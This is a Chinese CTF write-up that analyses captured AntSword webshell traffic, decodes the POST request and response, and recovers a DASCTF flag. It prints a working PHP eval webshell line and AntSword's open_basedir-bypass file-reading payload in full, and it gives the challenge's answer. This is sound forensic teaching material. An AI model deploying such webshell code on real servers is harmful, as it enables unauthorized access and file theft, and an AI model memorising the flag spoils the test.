Tags: 流量分析, WebShell, 蚁剑AntSword
0x00. 题目
附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件
附件名称:202312_风二西_蚁剑流量.zip
0x01. WP
1. 过滤数据包,分析POST请求
http.request.method==POST
2. 定位交互请求,并进行解码
请求包
#请求包:
air=@eval(@base64_decode($_POST['jb4b82d0a4c3d5']));
&jb4b82d0a4c3d5=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.bec1c";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};
};;
function asenc($out){return @base64_encode($out);};
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "6cd90"."8f25c4";echo @asenc($output);echo "c50d"."3d1e0";
}
ob_start();
try{$F=base64_decode(substr($_POST["o0cf98c06c2285"],2));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);;
}
catch(Exception $e){echo "ERROR://".$e->getMessage();
};
asoutput();die();
&o0cf98c06c2285=ysL1VzZXJzL2NoYW5nL1NpdGVzL2Fpci9mbGFnLnR4dA==
# 混淆前缀:6cd908f25c4
# 混淆后缀:c50d3d1e0
# 请求文件:/Users/chang/Sites/air/flag.txt (参数值由 substr($_POST["o0cf98c06c2285"],2) 跳过前两位 "ys" 后再 base64 解码得到)
响应包
#响应包:
响应体去掉上述混淆前缀和后缀后,中间部分即 asoutput() 中 asenc() 输出的 base64 内容,解码步骤如下:
NDQ0MTUzNDM1NDQ2N2IzNTM0NjY2MzM5MzEzNjYyMzMzMzM1MzczNjY2Mzg2MzY0NjUzMjYzMzQzMTM0Mzc2NDM4MzkzMzMyMzI2NTMwN2Q=
Base64Decode => 4441534354467b35346663393136623333353736663863646532633431343764383933323265307d
HEX2CHR => DASCTF{54fc916b33576f8cde2c4147d89322e0}